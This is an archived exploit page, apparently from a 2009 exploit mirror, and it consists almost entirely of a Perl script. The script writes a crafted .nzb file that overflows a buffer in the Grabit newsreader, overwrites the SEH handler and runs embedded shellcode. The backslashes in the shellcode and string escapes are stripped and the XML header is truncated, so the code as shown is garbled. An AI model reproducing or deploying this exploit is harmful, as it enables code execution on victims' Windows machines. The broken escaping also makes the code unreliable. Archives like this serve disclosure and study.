Grabit <= 1.7.2 Beta 3 (.nzb) Local Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Grabit <= 1.7.2 Beta 3 (.nzb) Local Buffer Overflow Exploit (SEH)
# Published : 2009-05-05
# Author : Gaurav Baruah
# Previous Title : PHP mb_ereg(i)_replace() Evaluate Replacement String Vulnerability
# Next Title : Sorinara Streaming Audio Player 0.9 (.m3u) Local Stack Overflow Exploit

#!/usr/bin/perl
# Grabit<=1.7.2 Beta 3 (.nzb) SEH Overwrite Exploit
# Coded by: Gaurav Baruah
# Discovery: Niels Teusink
#http://packetstormsecurity.org/filedesc/grabit-overflow.txt.html
# Greetz to Vivek
#Tested on XP SP3 and XP SP2 (en)
my $header1=
"<?xml version="1.0"?>
<!DOCTYPE nzb
  PUBLIC "-//newzBin//DTD NZB 1.0//EN"
         "";

my $shellcode=
"x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xe8".
"x61xfbx36x83xebxfcxe2xf4x14x89xbfx36xe8x61x70x73".
"xd4xeax87x33x90x60x14xbdxa7x79x70x69xc8x60x10x7f".
"x63x55x70x37x06x50x3bxafx44xe5x3bx42xefxa0x31x3b".
"xe9xa3x10xc2xd3x35xdfx32x9dx84x70x69xccx60x10x50".
"x63x6dxb0xbdxb7x7dxfaxddx63x7dx70x37x03xe8xa7x12".
"xecxa2xcaxf6x8cxeaxbbx06x6dxa1x83x3ax63x21xf7xbd".
"x98x7dx56xbdx80x69x10x3fx63xe1x4bx36xe8x61x70x5e".
"xd4x3excaxc0x88x37x72xcex6bxa1x80x66x80x91x71x32".
"xb7x09x63xc8x62x6fxacxc9x0fx02x9ax5ax8bx61xfbx36";

my $next_seh = "xEBx06x90x90";
my $seh = "xE5x56x01x10" ;   #libeay32.dll
my $file = "test.nzb";

open (nzb, ">./$file") || die "nCan't open $file: $!";
print nzb "$header1" . "x41" x 248 . "$next_seh" . "$seh" . "$shellcode";
close (nzb);
sleep 1;
print "nFile $file successfully created!n";

# www.Syue.com [2009-05-05]